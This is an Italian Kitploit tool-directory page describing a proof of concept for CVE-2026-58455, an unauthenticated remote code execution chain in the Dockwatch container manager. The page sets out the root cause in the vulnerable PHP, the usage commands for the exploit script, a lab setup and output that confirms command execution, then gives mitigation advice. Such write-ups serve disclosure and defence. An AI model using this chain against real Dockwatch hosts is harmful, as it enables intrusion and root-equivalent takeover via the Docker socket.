Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/boreas37/cve-2026-58455-poc
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingLab e Pratica
GitHubboreas37/cve-2026-58455-poc

CVE-2026-58455-PoC

PoC per CVE-2026-58455: Dockwatch <=0.6.567 RCE non autenticato. Python solo stdlib.

Vedi Repository
3 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-58455 — Dockwatch RCE non autenticato (bypass di autenticazione + iniezione di comandi)

Prova di concetto per CVE-2026-58455: esecuzione remota di codice senza autenticazione in Dockwatch (di Notifiarr), un'interfaccia web self-hosted per la gestione di container Docker. Interessa tutte le versioni fino alla 0.6.567.

Causa principale (verificata dal sorgente)

Tre falle concatenate:

  1. Flag di sessione impostato senza autenticazione — GET /includes/header.php esegue $_SESSION['IN_DOCKWATCH'] = true; per qualsiasi visitatore. Il livello AJAX (ajax/shared.php) controlla solo questo flag.

  2. Manca exit() dopo il redirect di autenticazione — loader.php invia un header Location: login.php quando $_SESSION['authenticated'] è false ma non termina l'esecuzione, quindi il resto della richiesta continua.

  3. Iniezione di comandi del sistema operativo — ajax/compose.php (m=composePull) costruisce un comando shell con input non sanificato:

root@kitploit:~
$cmd = 'cd ' . $_POST['composePath'] . ' && docker-compose pull';
$pull = $shell->exec($cmd . ' 2>&1');

L'output viene riflesso nella risposta HTTP.

Con le falle concatenate: un attaccante remoto non autenticato esegue comandi arbitrari del sistema operativo come utente del web server all'interno del container. Le distribuzioni tipiche montano /var/run/docker.sock nel container → equivalente a root sull'host.

Utilizzo

root@kitploit:~
python3 dockwatch_rce_poc.py --url http://HOST:PORT --command "id; hostname"
python3 dockwatch_rce_poc.py --url http://localhost:8888            # defaults

Solo libreria standard di Python 3.

Laboratorio (riproduzione)

root@kitploit:~
docker run -d --name dockwatch-lab -p 8888:80 \
  -v /var/run/docker.sock:/var/run/docker.sock \
  ghcr.io/notifiarr/dockwatch:v0.6.567

Output verificato

root@kitploit:~
$ python3 dockwatch_rce_poc.py --url http://localhost:8888 --command "id; hostname"
[+] Dockwatch fingerprint confirmed (200) <title>Dockwatch</title>
[+] Session primed (IN_DOCKWATCH flag set)
[*] ajax/compose.php responded HTTP 200, 100 bytes
[+] Command output recovered:
    uid=911(abc) gid=911(abc) groups=911(abc),281(unraiddocker),992(groupls7j),1000(users)
=> PASS (RCE confirmed)

Mitigazione

Aggiornare Dockwatch a una versione successiva alla 0.6.567. Come mitigazione, non esporre Dockwatch a reti non fidate e rimuovere il bind del socket Docker se non necessario.

Avvertenza

Solo per ricerca di sicurezza autorizzata e uso in laboratorio.

Scarica lo strumento